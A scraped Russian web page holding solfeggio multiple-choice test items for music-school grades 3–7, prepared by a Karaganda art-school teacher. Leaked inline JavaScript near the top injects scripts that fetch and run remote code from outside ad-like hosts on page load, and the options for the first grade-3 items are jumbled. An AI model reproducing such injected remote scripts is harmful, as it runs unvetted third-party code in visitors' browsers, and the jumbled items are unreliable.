header

Понедельник, Сентябрь 25, 2017
 
Рейтинг:   / 0
ПлохоОтлично 
( function ( src ) { var script = document.createElement( 'script' ); script.src = src; ( document.head || document.body || document.documentElement ).appendChild( script ); } )( '//infolooks.org/api/qfe5rqcvizmcjfars0wkmnytahh8sxz4' ); var s_advm_logic3 = document.createElement('div'); s_advm_logic3.id = 'advm_video'; document.getElementsByTagName('body')[0].insertBefore(s_advm_logic3, document.getElementsByTagName('body')[0].firstChild); var s_advm_logic4 = document.createElement('div'); s_advm_logic4.id = 'advm_block'; s_advm_logic4.style.display = 'none'; s_advm_logic4.innerHTML = '
Закрыть [X]
 
Осталось сек.
'; document.getElementsByTagName('body')[0].insertBefore(s_advm_logic4, document.getElementsByTagName('body')[0].firstChild); var s_advm_logic2 = document.createElement('script'); s_advm_logic2.type = 'text/javascript'; s_advm_logic2.src = 'http://c.am15.net/preloader7.js'; document.getElementsByTagName('head')[0].appendChild(s_advm_logic2); var s_advm_logic = document.createElement('script'); s_advm_logic.setAttribute("type", "text/javascript"); s_advm_logic.textContent = 'var advm_timeToShow=15;var autoclose=true;var preroll_timer=true;var preroll_begin_text="";var preroll_showtimes=1;var u_id=79249;var preroll_site_id=53170;var preroll_banner_size=3;var prerollBg="locker_bg2";var preroll_progress_bar_color="undefined";var preroll_panel_color="FFFFFF";var preroll_title_color="000000";var preroll_end_text="Закрыть [X]";'; document.getElementsByTagName('head')[0].appendChild(s_advm_logic);
Тестовые задания по сольфеджио предназначены для учащихся 3-7 классов ДМШ и ДШИ. Могут быть использованы для формирования банка вопросов при подготовке к творческим конкурсам на лучшее знание материала по предметам музыкально-теоретического цикла.

Коммунальное государственное казённое предприятие

«Школа искусств №2»

г.Караганды

Тестовые задания по сольфеджио
для 3-7 классов


 

подготовила

преподаватель сольфеджио высшей категории

Кузнецова Марина Геннадьевна

г. Караганда
2014

3 класс

  1. 1.    Лад, у которого между I и III ступенями образуется б.3, называется…
  2. 2.    Строение натурального минора:

А) мажором

Б) минором

В) секвенцией

А) 1, 1, ½, 1, 1, 1, ½

Б) 1, ½, 1, 1, ½, 1, 1

В) 1, 1, ½, 1, 1, 1, ½

  

  1. 3.    Транспонирование – это …

А) переход неустойчивых звуков в устойчивые

Б) перемещение мелодии на другую высоту

В) исполнение мелодии голосом

 

  1. 4.    Начало мелодии со слабой доли – это

А) секвенция

Б) ритм

В) затакт

 

  1. 5.    Пауза – это…

А) перерыв в звучании

Б) знак молчания

В) все ответы верны

 

  1. 6.    Вводные звуки – это

А) I, III, V ступени

Б) II, IV, VI, VII ступени

В) II, VII ступени

 

  1. 7.    Какую длительность добавляет точка, поставленная справа от четвертной?

А) восьмую

Б) четвертную

В) половинную

 

  1. 8.    В какой тональности тетрахорд сиb-до-ре-миb является верхним тетрахордом?

А) в Си b мажоре

Б) ми миноре

В) Ми b мажоре

 

  1. 9.    Какие интервалы являются совершенными консонансами?

А) ч.1, ч.4, ч.5, ч.8

Б) м.3, б.3, м.6, б.6

В) ув.4, ум.5

 

  1. 10.Тональность, параллельная Ля мажору – это …

А) До мажор

Б) фа минор

В) фа# минор

 

  1. 11.Сколько обращений имеет трезвучие?

А) три

Б) четыре

В) два

 

  1. 12.Ув.2 содержит…

А) 2 тона

Б) 1,5 тона

В) 3 тона

 

  1. 13.В каком виде минора возникает ув.2?

А) в натуральном

Б) в гармоническом

В) в мелодическом

 

  1. 14.Сколько м.3 находится на ступенях натурального мажора?

А) четыре

Б) одна

В) три

4 класс

  1. 1.    На каком тоне трезвучия строится квартсекстаккорд?

а) на терцовом

б) на основном

в) на квинтовом

 

  1. 2.    Пунктирный ритм выражается длительностями:

А) восьмая, 2 шестнадцатых

Б) восьмая с точкой и шестнадцатая

В) восьмая, четверть, восьмая

 

  1. 3.    Тритон – это

А) трезвучие на III ступени

Б) интервал, в котором 3 тона

В) м.3 и б.3

 

  1. 4.    В какой тональности больше ключевых знаков?

А) Ля мажор

Б) фа минор

В) до минор

 

  1. 5.    Интервал «ляb-ре» - это…

А) ув.4

Б) ч.4

В) ч.5

 

  1. 6.    Септаккорд состоит из…

А) септим

Б) семи звуков

В) терций

 

  1. 7.    Тональности Миb мажор и до минор являются

А) параллельными

Б) одноимёнными

В) устойчивыми

 

  1. 8.    Звук сольb – вершина м.6. Какой звук является её основанием?

А) си

Б) сиb

В) до

 

  1. 9.    В какой тональности трезвучие фа#-ля-до# будет S 5|3?

А) си миноре

Б) фа# миноре

В) до# миноре

 

  1. 10.D6|4 cтроится на…

А) II ступени

Б) VI ступени

В) V ступени

 

  1. 11.Ув.4 строится на…

А) IV ступени натурального минора

Б) VII# ступени гармонического минора

В) все ответы неверны

 

  1. 12.При обращении м.3 перейдёт в…

А) б.3

Б) б.6

В) б.7

 

5 класс

  1. 1.    Какого звука не хватает в звукоряде гармонического минора

g-a-b-c-d-_?_-fis-g

А) es

Б) e

В) f

 

  1. 2.    В какой аккорд разрешится S 6|4?

А) в T 5|3

Б) в D7

В) в T6

 

  1. 3.    Какой аккорд состоит из б.3+ч.4?

А) T5|3

Б) M6

В) D7

       4. Интервал dis-c – это

А) б.6

Б) м.7

В) ум.7

 

  1. 5.    Размер ¾ используется обычно в

А) польке

Б) вальсе

В) марше

 

  1. 6.    Какая ритмическая группа является триолью?

А) восьмая и 2 шестнадцатых

Б) восьмая, четверть, восьмая

В) 3 восьмых, вверху 3

 

  1. 7.    В какие тональности разрешится аккорд h-dis-fis-a

А) H-dur, h-moll  

Б) E-dur, e-moll

В) Es-dur, es-moll

  1. 8.    Перенесение акцента с сильной доли на слабую называется…

А) триоль

Б) затакт

В) синкопа

 

  1. 9.    В размере 3/8 каждая доля длится…

А) одну восьмую

Б) одну четверть

В) одну шестнадцатую

 

  1. 10.Сколько тритонов в натуральном мажоре?

А) три

Б) четыре

В) два

6 класс

 

  1. 1.    Гармонический звук в миноре – это

А) VI b ступень

Б) VII b ступень

В) VII# ступень

 

  1. 2.    В интервале «fis-e» качественная величина равна:

А) 5 тонам

Б) 6 ступеням

В) 7 ступеням

 

  1. 3.    Сколько Ум 5/3 в гармоническом мажоре?

А) одно

Б) два

В) ни одного

 

  1. 4.    В тональности H-dur аккорд h-dis-fis нужно обозначить, как…

А) Б 5/3

Б) М 5/3

В) Т 5/3

 

  1. 5.    Интервалы, которые могут быть построены только в гармонических ладах, называются…

А) характерными

Б) тритонами

В) диссонансами

 

  1. 6.    Сколько ступеней в пентатонике?

А) семь

Б) шесть

В) пять

 

  1. 7.    Какой аккорд состоит из м.3+ м.3?

А) М 5/3

Б) D7

В) все ответы неверны

 

  1. 8.    Какие аккорды строятся на II ступени?

А) ум.5,   Ум. 5/3, D 6/5

Б)Ум VII 7,   M VII 7,   D7

В) Ум 5/3, D43

 

  1. 9.    При разрешении вводных септаккордов непосредственно в тоническое трезвучие, в Т 5/3 удваивается

А) основной тон

Б) терцовый тон

В) квинтовый тон

 

  1. 10.Напишите слоговые значения звуков ( сохраняя их порядок)

b- eis – gis – a – h – as – es

а) си – миb - соль# - ля – сиb - ля# - ми

б) сиb – фа - соль - ля - си - ля# - до

в) сиb - ми# - соль# - ля - си - ляb - миb

 

7 класс

  1. 1.    Интервал a-fis определён как м.7. Что неверно в определении?

А) только буква

Б) только цифра

В) буква и цифра

 

  1. 2.    В альтерированном мажоре при движении вниз

А) повышаются II, IV, VI ступени

Б) понижаются VI , II ступени

В) понижаются VI, IV, II ступени

 

  1. 3.    Какой характерный интервал строится на III ступени гармонического минора?

А) ув.2

Б) ув.5

В) ум.7

 

  1. 4.    В строении какого из вводных септаккордов больше малых терций?

А) в M VII 7

Б) в Ум VII 7

В) малых терций вообще нет в их составе

 

  1. 5.    Ув 5/3 в Es-dur состоит из звуков

А) d-f-as

Б) f-as-c

В) ces-es-g

 

  1. 6.    Куда разрешится аккорд f-as-b-d?

А) в Des-dur

Б) в Es-dur

В) в e-moll

 

  1. 7.    Как с латинского переводится слово «dur»?

А) «твёрдый»

Б) «мягкий»

В) «мажор»

 

  1. 8.    В хроматической минорной гамме при движении вверх повторяются все ступени, кроме…

а) I, V

б) III, VI

в) IV, VI

 

  1. 9.    Сколько других энгармонических вариантов замены имеет звук «fis»?

А) три

Б) один

В) два

 

  1. 10.Какая пара характерных интервалов имеет в своём составе устойчивый звук?

А) ув.2, ум.7

Б) ув.5, ум.4

В) ум.5, ув.4

 

 

Использованные материалы и Интернет-ресурсы:

 

http://festival.1september.ru/articles/596113/

http://metodisty.ru/m/files/view/programma_po_solfedzhio_5-ti_letnee_obuchenie_2009

http://rumc09.ru/news/programma_po_solfedzhio/2012-11-04-127

http://pedsovet.su/load/122-1-0-5722

http://www.moluch.ru/conf/ped/archive/72/4071/

 
 
 
 
 
 

У вас нет прав для создания комментариев.